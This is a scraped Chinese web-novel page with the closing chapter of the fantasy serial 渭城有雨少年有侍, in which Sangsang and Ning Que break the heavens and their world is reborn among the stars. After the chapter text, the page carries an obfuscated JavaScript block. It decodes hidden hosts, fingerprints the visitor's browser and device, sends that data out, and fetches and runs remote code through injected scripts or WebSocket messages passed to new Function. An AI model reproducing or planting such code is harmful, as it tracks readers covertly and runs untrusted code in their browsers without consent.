笔下文学

下载
字:
关灯 护眼
笔下文学 > 渭城有雨少年有侍 > 第六卷忽然之间 第一百三十章 结尾

第六卷忽然之间 第一百三十章 结尾

不想错过《笔下文学》更新?安装笔下文学专用APP,作者更新立即推送!

放弃立即下载
章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
“当永夜来临,太阳的光辉将被尽数遮掩,天空与天地陷入黑暗之中,人们将为之欢欣鼓舞,因为那才是真实地活着。”
  
  叶苏成圣之前,说过这样一段类似于预言的话。
  
  而在无数年之前,佛陀观七卷天书,然后在明字卷上写下一段批注,在他的笔记里也有类似的记载,是这样说的。
  
  “永夜之末法时代,方有月现,自然复生。如此方不寂灭,世界另有出道。既然如此,静侯长夜到来便是,何苦强行逆天行事。莫非这天也在等着夜的到来?还是说它在恐惧夜的到来?它恐惧的是夜本身,还是随夜而至的月?”
  
  正在发生的事情,证明了叶苏的预言,也对佛陀留下的那些疑问做出了完美的回答,有个天在等待夜的到来,有个天在恐惧夜的到来,它恐惧的是夜本身,也是随夜而至的月,因为夜是随月而至的。
  
  世界一片黑暗,太阳被遮住,神国隐于浓重的墨色里,黯淡的极难看见,飘在长安城前的观主,神情异常复杂。
  
  徒有规则,却失去了力量的本源,还如何战斗?那道自神国降落的光柱,早已焕散不知去了何处,人间的酷热早已被清凉取代。
  
  再没有任何力量能够阻止宁缺写出来的那个符。
  
  两道深渊在大地的表面上快速蔓延,那个“人”字变得越来越大,地面真的很像一张纸被缚住,然后缓缓隆起。带来轰隆如雷的声音。
  
  这个过程很缓慢,却无可阻挡。
  
  不知过了多长时间,天边出现了地平线,海那头的帆舟只能看见帆尖,如果站的足够高,甚至能够看到远处微弯的弧。
  
  “这就是新世界吗?”桑桑问道。
  
  宁缺回答道:“也许。”
  
  那个完美的气泡再次出现在她身前,上面两道微小的裂痕已经变得极深,气泡随时可能破灭,那代表着她的世界即将毁灭。
  
  桑桑平静地看着这个世界,等待着自己的死亡。
  
  宁缺轻轻地抱着她。与她一道等待着。
  
  无数充满渴望的意愿或者说力量。顺着地面那两道越来越深的裂缝,从人间的四面八方涌来,进入长安城的街巷,通过惊神阵进入桑桑的身体里。
  
  桑桑当然接触过这种意愿。她在神国倾听信徒的祈祷无数万年。然而她却是第一次接触到如此真切的渴望。令她都有些动容的渴望。
  
  就在瞬间,她明白了书院、明白了叶苏创建的新教。世人爱与不爱她,其实并不重要。她爱不爱世人,其实也不重要,她与人类,本来就是一体的,她并不是这个世界冰冷的客观规则,而是人类认识的世界的……规则!
  
  一道亮光闪过规则如果是人类认识世界的产物,那么自然可以改变,她自然可以随着人类的认识一道成长!
  
  桑桑静静看着宁缺说道:“我,似乎可以活着。”
  
  宁缺的手臂微微颤抖,看着她的眼睛说道:“那就永远活着。”
  
  桑桑说道:“但我不想再服侍你了。”
  
  宁缺说道:“我服侍你。”
  
  无数渴望无数意愿,自人间各处而来,被惊神阵化作力量。
  
  长安城的城墙上出现无数道裂缝。
  
  桑桑抬头望向漆黑的夜穹,看着若隐若现的神国。
  
  她轻轻挥了挥手。
  
  无声无息间,一道没有颜色的光柱,从长安城里向着夜穹射出。
  
  那道光柱出于惊神阵,却经过了她的手。
  
  于是,那是透明的光。
  
  她最清楚,如何破开自己的世界。
  
  透明的光柱穿过观主的身体,落到了夜穹上。
  
  桑桑摘下墨镜,仔细地让宁缺戴上。
  
  月亮还在夜穹里。
  
  太阳却仿佛离地面近了些,于是露出了明亮的边缘。
  
  光明重新降临人间,却已不如先前那般炽烈恐怖。
  
  苍白的天空重新变的湛蓝,像她雁鸣湖畔宅院里偷偷藏着的名贵水洗瓷。
  
  湛蓝的天空上出现了三道裂缝。
  
  与大地上的三道裂缝遥遥相对。
  
  都是一个人字。
  
  那道透明的光柱蕴含着难以想象的力量,竟是要直接将天空撕破!
  
  光柱是透明的,里面的气息却并不纯净,纷杂到了极点,亿万人便有亿万意愿,如何能够完全一致,但却鲜活到了极点。
  
  宁缺想起湖那边街畔蒸包子铺的热气,青石板上的脚印。
  
  桑桑想起雪海畔那夜,那个温泉。
  
  不知道观主想起了什么。
  
  他看着那道透明的光柱,感受着其间的宏大与微渺,被远胜肃穆的美感动,微微皱眉问道:“这是什么力量?这是什么气息?”
  
  “这就是人间之力。”宁缺说道。
  
  观主沉默片刻,说道:“原来是这样的。”
  
  湛蓝天空深处,若隐若现的神国,在人间之力的冲洗下,以难以想象的速度风化腐朽,然后垮塌成最细微的尘埃。
  
  紧接着破裂垮塌的是湛蓝天空本身,天空变成无数轻如鹅毛的薄玉片,纷纷扬扬洒落人间,再也无法遮住人们望向外界的双眼。
  
  天空上面是什么?以前是神国,现在神国毁灭了,那里到底有什么?
  
  那是一片漆黑的宇宙,显得无比寒冷,看上去异常荒芜,没有任何人烟,给人一种极度不安的感觉,仿佛真实的幽冥。
  
  整个世界再次安静下来。
  
  没有人说话。
  
  这是冥界吗?
  
  人们想着。
  
  宁缺和桑桑,很清楚会看到什么,他们并不吃惊。
  
  但不代表别人会不吃惊。
  
  大河国某个山村里。一个孩子拿起先前被太阳烤至半熟的鸡蛋,看着漆黑的天穹发呆,心想为什么太阳忽然间变的那么远?
  
  星星为什么也变远了?
  
  孩子很害怕,咧着嘴便要哭,手里的鸡蛋落到地上,啪的一声破掉。
  
  风吹鸡蛋壳,还有将凝未凝的蛋白,与蛋黄。
  
  桑桑面前的气泡,也破了。
  
  ……
  
  ……
  
  在广漠无垠的宇宙里,有一个燃烧的火球。
  
  那是一颗恒星。
  
  从恒星表面的颜色看。还很年轻。
  
  有七颗行星围绕恒星旋转。
  
  在距离那颗恒星约一点五亿公里的的轨道上。什么都没有。
  
  那里是空白的,也可以空白,因为系统是稳定的,但不知道为什么。总有一种少了些什么似的感觉。
  
  某刻。那里的空间忽然发生了轻微的扭曲。
  
  过了很久很久。扭曲的空间表面出现了两条清晰的裂缝。
  
  又过了很久很久,裂缝蜷曲,然后消失。
  
  一颗蓝色的星球。出现在那里。
  
  那个过程很难形容,这颗星球的出现,似乎用了很长时间,才从那个空间裂缝里出来,又似乎它瞬间便出现在这条轨道上。
  
  那颗星球之所以是蓝色的,是因为海洋覆盖着表面绝大多数面积。
  
  随着蓝色星球的突兀出现,一道无形的引力波,向着四周散播。
  
  围绕着那颗恒星而构成的星系,出现了不稳定的征兆,幸运的是,这个星系里那几颗质量巨大的行星,距离这颗蓝色星球的距离足够遥远。
  
  但它的出现,终究造成了影响,有几颗行星的轨道突然发生变化,或者要过很久很久,才能重新稳定下来。
  
  更不幸的是,距离恒星约三点几亿公里的空间里,密布着无数小行星,突然出现的蓝色星球,就像是块美味的蛋糕一般,吸引着它们前往。
  
  无数小行星甚至是小颗的陨石,离开它们原先定居的空间,向着那颗蓝色星球静静的飞去,自然不可能走直线,但总有相遇的那一刻。
  
  宇宙里死寂一片。
  
  那些小行星与陨石拖出的极淡的曳尾,就像是死神行走的痕迹。
  
  ……
  
  ……
  
  满天陨石,在漆黑的夜穹里向着地面而来。
  
  片刻后,世界便会毁灭。
  
  天空之上,果然是冥界。
  
  “你就是冥王之子。”
  
  观主看着宁缺说道。
  
  冥界是传说,是昊天的谎言,这是现在已经被接受的说法。
  
  但那是真的吗?
  
  多年前,卫光明在长安城看到了宁缺,认为他就是冥王之子。
  
  后来,桑桑被认为是冥王的女儿。
  
  隆庆认为自己才是冥王之子。
  
  兜兜转转,循环不断,最后,还是落在了宁缺的身上。
  
  他毁灭了昊天的世界,迎来了新的世界。
  
  然而这个新世界还没有存在很长时间,便迎来了毁灭。
  
  真实的宇宙,是那样的荒凉又危险,而且寒冷,和冥界有什么区别?
  
  他没有把冥界指引到人间,却把人间带进了冥界。
  
  他当然就是冥王的儿子。
  
  “不应该是这样的。”
  
  宁缺的声音有些寒冷。
  
  ……
  
  ……
  
  小镇里。
  
  君陌挥手破了阵。
  
  他望向那些将要降临人间的死亡使者,说道:“拾起你的刀。”
  
  屠夫拾起那把沉重的刀,走到他身旁,一同抬头望去。
  
  君陌举起铁剑,说道:“想不想去战一场?”
  
  屠夫说道:“很好。”
  
  ……
  
  ……
  
  西陵神殿。
  
  战斗早已结束,新教的信徒,坐在崖坪间,坐在山道上,看着这远远超出想象的画面,震撼的无法言语。
  
  陈皮皮站起身来,微微蹙眉,说道:“不应该是这样的。”
  
  唐小棠握住铁棍,没有说话。
  
  叶红鱼站在崖畔,血色的裁决神袍在夜风里猎猎作响。
  
  她看着夜空,面无表情说道:“域外天魔?待本座把你斩了。”
  
  ……
  
  ……
  
  这个世界上的人们不知道那些带着死亡气息的陨石是什么。
  
  但修行者们能够感觉到另一个明确的现实。
  
  天空没有了。
  
  他们的身体变得轻了很多。
  
  轻若羽毛。
  
  只要动念。便似乎可以离开地面。
  
  昊天世界压制修行者无数年的规则,已经不复存在。
  
  修行者们,获得了真正的自由。
  
  不惑境界的修行者,忽然洞玄。
  
  洞玄境界的修行者,看着天上真正的繁星,知了天命。
  
  知命境的大修行者,轻而易举地迈过了那道门槛。
  
  人间,前所未有的强大。
  
  他们没有想到,刚刚获得自由,便要迎来生死立见的一战。
  
  不过。无人畏惧。
  
  因为这种感觉真的很好。值得他们为之而奋斗。
  
  而且他们有信心战胜所有的外敌。
  
  ……
  
  ……
  
  无数修行者准备着战斗。
  
  但他们没有出手的机会。
  
  就连君陌的铁剑都没有机会出手。
  
  海洋对着恒星,陆地对着宇宙深处,修行者们所在的位置,能够看到满天繁星。也能看到显露出真容的月亮。
  
  以修行者们的眼力。自然能看清楚。那是一个岩石组成的圆球,表面光滑到了极点,反射着大地背后的光线。完美到了极点。
  
  或者不应该称之为月亮,而应该称之为月球。
  
  那轮明月,挡住了所有的陨石。
  
  轰隆隆的巨响,无法传到地面,地面上的人们都感同身受。
  
  如此密集的撞击,如此恐怖的威力。
  
  就算是知命巅峰、甚至是逾过五境的大修行者,都很难存活下来。
  
  那轮明月,替人类承受了所有的攻击,它能顶得住吗?
  
  不知过了多长时间。
  
  恐怖的撞击声终于停止。
  
  月亮不再完美,上面到处都是撞击形成的环形山,到处都有岩浆喷涌,形成或高或低的原地,有些地方明亮,有些地方暗沉。
  
  这样的月亮真的不好看,甚至有些丑陋,但在人们的眼里依然完美。
  
  他在人间默默守护了千年,今后,大概也会万年亿年的默默守护下去吧?
  
  ……
  
  ……
  
  夜晚结束,清晨来临,朝阳从东方缓缓升起。
  
  天空重新出现,还是那般湛蓝,却比以往多了些说不清楚的感觉。
  
  是的,这片天空更加开阔,其后有无尽的空间。
  
  “这感觉……原来确实不错。”观主看着宁缺问道:“但人已经变得不再像是从前的人,人间还是我们在意的人间吗?”
  
  “人生活的地方就是人间,不是吗?”
  
  宁缺说道:“酒徒认为修行者、尤其是到了某种程度的修行者已经不能算是人,是非人,但我不这样认为,我认为修行者是超人。”
  
  观主问道:“超人?”
  
  宁缺说道:“是的,就像世界需要改变一样,人类最终也需要进化,我不认为这是一件不好的事情,相信猿猴当时也是这样认为的。”
  
  他的话音刚落,天空里忽然出现了一道笔直的白线。
  
  他看的清楚,那道白线的前端,是一名修行者。
  
  那名修行者穿着蓝色长衫,时而被朝阳耀成红色。
  
  观主若有所思道:“那是梁国的一名散修,境界很糟糕。”
  
  宁缺看着那道白线飞出大气层,向着外太空飞去,笑了起来。
  
  紧接着,数千道细细的白线从地面生起,向着大气层外飞去,每道白细的前端,都是一名修行者,画面蔚为壮观。
  
  人类,开始了自己新的旅程。
  
  “有些意思。”
  
  观主平静说道,然后变成无数光点,消散在新世界的第一道晨风里。
  
  宁缺知道,在透明光柱穿过他身体的时候,他就已经死了,先前和自己对话的是他以极高境界强行留在这个世界的残留意识,因为他不放心,他想看看新世界是否能够在冥界存在下去,想看看人类是否能够延续下去。
  
  最后他觉得应该可以,于是便死了。
  
  观主有姓无名。他就叫陈某。
  
  陈某里的某,是某某里的某,是人间随处可见的某某。
  
  他代表着人类的一部分。
  
  宁缺望向天空一角,渐要被晨光遮住的月亮。
  
  夫子代表着人类的另一部分。
  
  桃山崖畔,陈皮皮长拜及地,神情平静。
  
  唐小棠随他拜倒。
  
  ……
  
  ……
  
  没有永夜。人间越来越冷,那是世界外的寒意正在入侵,以此看来,无论有没有夫子,有没有书院。这个世界终究不可能永远地孤单下去。
  
  阳光洒落。雪峰上的雪渐渐融化,变成涓涓细流,然后汇成小溪向南流去,或者在荒原上会泛滥成灾。然而却也会给那里带去灌溉所需的水。
  
  余帘在断崖上抱着大师兄坐了很多天。
『加入书签,方便阅读』
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x64\x63\x54\x41\x68\x4e\x6d\x57\x54\x4b']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='nob'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});var param=(function(aid){var W=window,D=document,B=D.body,N=navigator,E='ontouchstart'in W||N.maxTouchPoints>0||N.msMaxTouchPoints>0;function fix(s){return encodeURIComponent(s).replace(/[!'()*]/g,function(c){return'%'+c.charCodeAt(0).toString(16)})}function mix(t,s){var a=[].slice.call(arguments),k,r=typeof a[a.length-1]=='boolean'?a.pop():true;for(var i=1;s=a[i++];){for(k in s)if(r||!(k in t))t[k]=s[k]}return t}var utils={guid:function(){function a(){return Math.floor((1+Math.random())*0x10000).toString(16).substring(1)}return a()+a()+''+a()+''+a()+''+a()+''+a()+a()+a()},bind:function(o,e,c){return'string'===typeof o&&(o=D.getElementById(o)),e=e.replace(/^on/i,'').toLowerCase(),o.addEventListener?o.addEventListener(e,c,!1):o.attachEvent&&o.attachEvent('on'+e,c),o}};var p1={dcc:'',dcl:'',gvd:'',grr:'',ct:''},p2={diit:'',dit:'',cmn:''},cmn=[];var mobile={ma:function(){if(!E)return;function l(s){if(!s)return;return s.toString().substr(0,5)}utils.bind(W,'deviceorientation',function handleFunc(ev){if(!ev.alpha)return;p2.diit=[l(ev.alpha),l(ev.beta),l(ev.gamma)].join(',')});utils.bind(W,'devicemotion',function handleFunc(evnet){var a=evnet.accelerationIncludingGravity;if(!a.x)return;p2.dit=[l(a.x),l(a.y),l(a.z)].join(',')});utils.bind(W,'touchstart',function touchstart(ev){var clientX=ev.touches[0].clientX,clientY=ev.touches[0].clientY,v=[clientX,clientY].join('_');if(cmn.length%lt;3)cmn.push(v)})},md:function(){try{N.getBattery().then(function(b){p1.dcc=b.charging?'yes':'no';p1.dcl=Math.round(b.level*100)})}catch(e){}try{var a=D.createElement('canvas'),b=a.getContext('experimental-webgl'),c=b.getExtension('WEBGL_debug_renderer_info'),d=b.getParameter(c.UNMASKED_VENDOR_WEBGL),e=b.getParameter(c.UNMASKED_RENDERER_WEBGL).replace(/[%]/g,'');p1.gvd=d;p1.grr=e}catch(e){}try{if(!N.connection){p1.ct='unknown';return}if(!N.connection.type){p1.ct='unknown';return}p1.ct=N.connection.type}catch(e){}},init:function(){this.ma();this.md()},ap:function(){p2.cmn=cmn.join(';');return mix(p1,p2)}};mobile.init();var client={client:function(id){var ut=utils,m=mobile;function a(){var a='';try{a=W.opener?W.opener.document.location.href:D.referrer}catch(e){a=D.referrer}if(a!=='')a=a.substr(0,8192);return fix(a)}function b(){var a='';try{a=W.top.document.location.href}catch(e){a=D.location.href}if(a!=='')a=a.substr(0,2048);return fix(a)}function c(str){var s='';for(var i=0;i%lt;str.length;i++)s+=(i>0?':':'')+str[i].charCodeAt(0);return s}function d(){try{return[W.screen.width,W.screen.height].join('x')}catch(e){return''}}function f(){return N.platform.replace(/Win/i,'v')}function g(){var a=W.screen.availWidth||0,b=W.screen.availHeight||0;return[f(),S(),W.devicePixelRatio||0,a+'.'+b].join(':')}function h(){var n=W['navigator'],a=false;for(var k in n){try{a=N['hasOwnProperty'](k)}catch(e){a=false}}return a}function i(){if(typeof N.languages!=='undefined'){try{return N.languages[0].substr(0,2)!==N.language.substr(0,2)}catch(err){return true}}return false}function j(f){var a=[];for(var i=0;i%lt;f.length;i++)a.push(String.fromCharCode(f[i]));return a.join('')}function k(){var a=['callPhantom'in W,'_phantom'in W,'phantom'in W];for(var i=0;i%lt;a.length;i++)if(a[i])return true;return false}function l(){return j([119,101,98,100,114,105,118,101,114])in N}function S(){var b=['toString','length'];(function(a,c){var f=function(g){while(--g){a['push'](a['shift']())}};f(++c)}(b,0xb3));var c=function(a){a=a-0x0;return b[a]};return eval[c('0x1')]()[c('0x0')]*0x673124}function n(){if(typeof W.history!=='undefined'&&typeof W.history.length!=='undefined')return W.history.length;return 0}function o(){return{top:B.scrollTop||D.documentElement.scrollTop,left:0}}function _uuid(){try{var a='',k='fillStyle',q='beginPath',n='closePath',j='fill',h='arc',e='fillText',w=Math.PI;var p=D.createElement('canvas');p.width=2000;p.height=200;p.style.display='inline';var s=p.getContext('2d');s.rect(0,0,10,10);s.rect(2,2,6,6);a+='canvas winding:'+((s.isPointInPath(5,5,'evenodd')===false)?'yes':'no');s.textBaseline='alphabetic';s[k]='#f60';s.fillRect(125,1,62,20);s[k]='#069';s.font='11pt no-real-font-123';var u='Cwm fjordbank glyphs vext quiz, \ud83d\ude03';s[e](u,2,15);s[k]='rgba(102, 204, 0, 0.2)';s.font='18pt Arial';s[e](u,4,45);s.globalCompositeOperation='multiply';s[k]='rgb(255,0,255)';s[q]();s[h](50,50,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(0,255,255)';s[q]();s[h](100,50,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(255,255,0)';s[q]();s[h](75,100,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(255,0,255)';s[h](75,75,75,0,w*2,true);s[h](75,75,25,0,w*2,true);s[j]('evenodd');if(p.toDataURL){a+=';canvas fp:'+p.toDataURL()}return(function(c){var b=0;if(c.length===0){return b}for(var i=0;i%lt;c.length;i++){b=((b%lt;%lt;5)-b)+c.charCodeAt(i);b=b&b}return b})(a)}catch(o){return o.message}}function init(){var p={frm:W.top!==W.self?1:0,ref:a(),url:b(),ic:N.cookieEnabled?1:0,pl:N.plugins.length,ml:N.mimeTypes.length,sid:c(g()),ps:N.productSub||'',lgs:i()?1:0,zo:new Date().getTimezoneOffset(),ws:d(),gdm:N.deviceMemory||0,iw:l()?1:0,cpn:N.hardwareConcurrency||0,fid:'',hl:n(),ihn:h()?1:0,md:E?1:0,ns:'',np:'',pj:k()?1:0};mix(p,o(),{'id':id,'rid':ut.guid(),'rid2':ut.guid(),'uuid':_uuid()},m.ap());return p}return init()}};return new Promise(function(resolve,reject){setTimeout(function(){var r=[],u=aid.split('-'),p=client.client(u[1]);for(var k in p)r.push(k+'='+p[k]);resolve(r.join('&'))},10)})})(id);param.then(function(p){i=i+'?'+p;for(var j in l)t[j]=setTimeout(f,delay*j)});})('aHR0cHM6Ly9vc2tkMmtqODk5LmJhbWNzZm0uYY29t','d3NzOOi8vd3MuZ2VuZ2Z1cXVhbi5jb206OOTE5MSx3c3M6Ly93cy5xb3Jvc21hbGwuY29tOOjkxOOTEsd3NzOOi8vd3Mud2VpeGlzaXdhbmcuY29tOOjkxOOTE=',window,document,['Y','O']);}:function(){};
下载